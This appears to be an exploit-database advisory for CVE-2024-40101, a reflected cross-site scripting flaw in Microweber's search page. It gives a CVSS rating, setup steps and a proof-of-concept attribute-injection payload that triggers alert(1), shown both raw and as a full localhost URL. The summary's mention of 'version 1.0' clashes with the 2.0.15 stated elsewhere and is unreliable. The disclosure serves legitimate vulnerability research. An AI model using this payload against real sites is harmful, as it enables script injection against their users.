Microweber 2.0.15 Cross Site Scripting Vulnerability

2024-08-0700:00:00

Prerak Mittal

0day.today

microweber

xss

vulnerability

app installation

reproduction

steps

prerak mittal

docker

cve-2024-40101

ubuntu 22.04

payload

alert

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.5

Confidence

High

EPSS

0.001

Percentile

21.3%

JSON

Microweber version 1.0 suffers from a cross site scripting vulnerability in the search functionality. Original discovery of cross site scripting in this version is attributed to tmrswrr in June of 2024.

# Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Prerak Mittal
# Vendor Homepage: https://microweber.org/
# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15
# Version: <=v2.0.15
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-40101

# Description:
## App Installation:
1. Clone the repository and build the application using docker:
```
git clone -b v2.0.15 https://github.com/microweber/microweber.git
cd microweber
docker compose up -d
```
2. Visit http://localhost
3. Follow along the UI installation process.

## Steps to reproduce:

1. Visit http://localhost/search
2. Insert the below payload in `keywords` parameter:
  "onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"

  Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22
  
3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.